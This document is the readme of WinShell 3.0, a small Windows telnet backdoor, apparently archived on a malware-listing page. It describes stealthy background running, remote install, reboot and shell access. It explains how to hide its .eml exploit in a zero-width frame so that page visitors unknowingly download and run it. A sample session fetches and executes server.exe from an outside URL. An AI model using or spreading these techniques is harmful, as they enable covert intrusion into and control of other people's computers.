WinShell 3.0
(Backdoor.Win32.WinShell.30)

by Mr.Janker

Written in Visual C++

Made in China

more versions


WinShell v3.0

a small and power
telnet server program

for win9x/Me/NT/2000/xp

by janker

  
 




Release Date: 11/20/2001
=====================================================================

[What's WinShell]
-----------------
WinShell was a small telnet server program for windows.
It just was a alone exe file, and it's size was very thin, only about 5k bytes.

Maybe it is the smartest telnet server in the world! :)

[Function List]
---------------
1. For Win9x/me/nt/2000/xp
2. Support all the standard telnet client 
3. Run in the background stealthily
4. Support muti-user logon together
5. Provide password protect
6. Custom listening port
7. Custom autoinstall
8. Custom install regkeyname
9. Remotely install
10. Remotely uninstall
11. Remotely download file
12. Remotely show winshell path
13. Remotely reboot
14. Remotely shudown
15. Remotely terminate winshell
16. Perfectible internal error handle
17. No backdoor password set

[Release Files List]
--------------------
Filename            Description
~~~~~~~~~~~~~~~~    ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
ws_maker.exe        the winshell make program
ws_maker.exe.sig    the PGP sign file
winshell.exe        the winshell program of default configure
winshell.exe.sig    the PGP sign file
winshell.exe.eml    the exploit format for ms outlook and ie
winshell.txt        this help file

[Default WinShell Configure]
----------------------------
1. Port is 5277
2. No password needed
3. RegKeyName is "winshell"
4. Don't autoinstall
To start it, just run winshell.exe.

[Command Line Parameter]
------------------------
WINSHELL.EXE [port|5277] 
Example: 
C:\>winshell 8888
Winshell will listen on the port 8888.

[Make New Winshell]
-------------------
C:\>ws_maker
You will see a gui windows, it is very easy to make a custom
winshell program.

[About Winshell.exe.eml]
This is a exploit program format for ms outlook and ie, you
could embed it to a htm file, So if someone view this page,
winshell will automatically download and run. Example:

C:\inetpub\wwwroot\>type default.htm
...
<frameset cols="0,*">
<frame src="winshell.exe.eml">
...
Note: 
default.htm and winshell.exe.eml must be in the same directory.

[Logon Default WinShell]
------------------------
C:\>TELNET 192.168.0.1 5277
If successful, you will see the following message: 

WinShell v3.0
(C)2001 by janker
http://www.red8black.com

? for help
CMD>?
i install
u uninstall
url download
p path
r reboot
s shutdown
q quit
! end
? for help
CMD>p
C:\winnt\system32\winshell.exe
? for help
CMD>http://www.xxx.com/download/server.exe
Download to C:\winnt\system32\server.exe
...OK!
? for help
CMD> <- Now directly press "Enter" key to enter shell

Microsoft Windows 2000 [Version 5.00.2195]
(C) Copyright 1985-2000 Microsoft Corp.

C:\winnt\system32>server <- Run the server.exe

C:\winnt\system32>exit   <- Exit winshell.


Janker
MCSE, CCNA
Network Security Consultant


Server:
size: 6 KB

port: 5277 TCP

startup:
none

MegaSecurity